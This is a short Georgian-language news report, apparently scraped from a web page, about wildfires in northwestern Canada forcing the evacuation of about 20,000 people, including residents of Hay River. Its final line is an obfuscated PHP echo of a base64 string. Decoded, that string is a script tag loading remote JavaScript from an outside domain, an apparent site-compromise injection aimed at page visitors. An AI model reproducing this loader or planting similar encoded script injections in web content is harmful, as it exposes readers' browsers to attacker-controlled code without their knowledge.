celsiusi
ავერსი შნაიდერი

კანადაში, ტყეში მასშტაბური ხანძრების გამო 20 000 ადამიანის ევაკუაცია მიმდინარეობს. ინფორმაციას „ბიბისი“ ავრცელებს.

ქვეყნის ჩრდილოეთ ნაწილში მდებარე უმსხვილესი ქალაქის მცხოვრებლების ევაკუაცია მას შემდეგ გახდა საჭირო, რაც ცეცხლი დასახლებას 17 კილომეტრის მანძილზე მიუახლოვდა.

გავრცელებული ცნობების მიხედვით, ხანძრები კიდევ ერთ ქალაქს, ჰეი რივერის მოსახლეობასაც ემუქრება, საიდანაც 3 000 ადამიანი უკვე გაიყვანეს.

ქვეყნის ისტორიაში ყველაზე მასშტაბურ ევაკუაციას კანადის არმია ატარებს. მოქალაქეების უდიდესი ნაწილი ალბერტას პროვინციაში გადაჰყავთ. ჯერ უცნობია, როდის შეძლებენ ევაკუირებულები სახლებში დაბრუნებას.

კანადის ჩრდილო-დასავლეთ ნაწილში საგანგებო მდგომარეობის რეჟიმი 15 აგვისტოდან ამოქმედდა. ამჟამად რეგიონში ცეცხლის 200-ზე მეტი კერაა.

სტიქიის გამო რეგიონში არ მუშაობს ინტერნეტი და სატელეფონო კავშირი შეფერხებულია.

301
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");